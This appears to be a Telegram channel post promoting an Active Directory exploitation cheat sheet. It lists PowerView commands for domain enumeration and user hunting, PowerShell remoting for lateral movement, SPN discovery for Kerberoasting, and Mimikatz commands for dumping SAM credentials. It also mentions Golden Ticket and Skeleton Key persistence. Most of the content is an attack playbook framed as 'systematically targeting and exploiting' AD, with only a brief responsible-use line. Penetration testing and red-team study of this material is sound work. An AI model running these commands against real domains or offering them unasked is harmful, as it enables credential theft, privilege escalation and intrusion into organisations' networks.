UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.3K links
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

Web & Services:
Undercode.help
Download Telegram
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Active Directory Exploitation Cheat Sheet - AD Enumeration and Exploitation

The Active Directory Exploitation Cheat Sheet by [S1ckB0y1337](https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet) is a comprehensive collection of enumeration and attack methods for Windows Active Directory environments. This resource is ideal for penetration testers and red teamers focusing on AD security.

---

### GitHub Repository:
[Active Directory Exploitation Cheat Sheet](https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet)

---

### Commands and Usage Examples:

#### 1. Domain Enumeration
Using PowerView:
# Get current domain details
Get-Domain

# Enumerate domain users
Get-DomainUser | Out-File -FilePath .\DomainUsers.txt

# Enumerate domain controllers
Get-DomainController

---

#### 2. Lateral Movement
Using PowerShell Remoting:
# Enable remoting
Enable-PSRemoting -Force

# Invoke a remote command
Invoke-Command -ComputerName <TargetComputer> -ScriptBlock {Get-Process}

---

#### 3. Privilege Escalation
Using Kerberoasting:
# Find SPNs for Kerberoasting
Get-DomainUser -SPN

Exported SPNs can then be cracked using tools like Rubeus or Hashcat.

---

#### 4. Credential Dumping
Using Mimikatz:
# Launch Mimikatz
mimikatz.exe

# Dump credentials
privilege::debug
lsadump::sam

---

### Popular Features:
1. User Hunting: Locate where privileged users have active sessions:

   Find-DomainUserLocation

2. Enumeration of Group Policies:

   Get-DomainGPO | Sort-Object -Property DisplayName

3. Abusing ACLs for Privilege Escalation:

   Get-DomainObjectAcl -Identity <AccountName> -ResolveGUIDs

---

### Notable Tools Integrated:
- PowerView: Active Directory enumeration.
- BloodHound: AD attack path analysis.
- Mimikatz: Credential dumping.
- Impacket: Exploitation toolkit.

---

### Key Use Cases:
1. Enumeration: Map out users, computers, and domain trust relationships.
2. Privilege Escalation: Exploit Kerberoasting, constrained delegation, or DNSAdmins.
3. Lateral Movement: Execute remote commands and pivot across systems.
4. Persistence: Set up Golden Tickets or Skeleton Keys.

This cheat sheet is an essential resource for systematically targeting and exploiting Active Directory. Use it responsibly and within legal boundaries!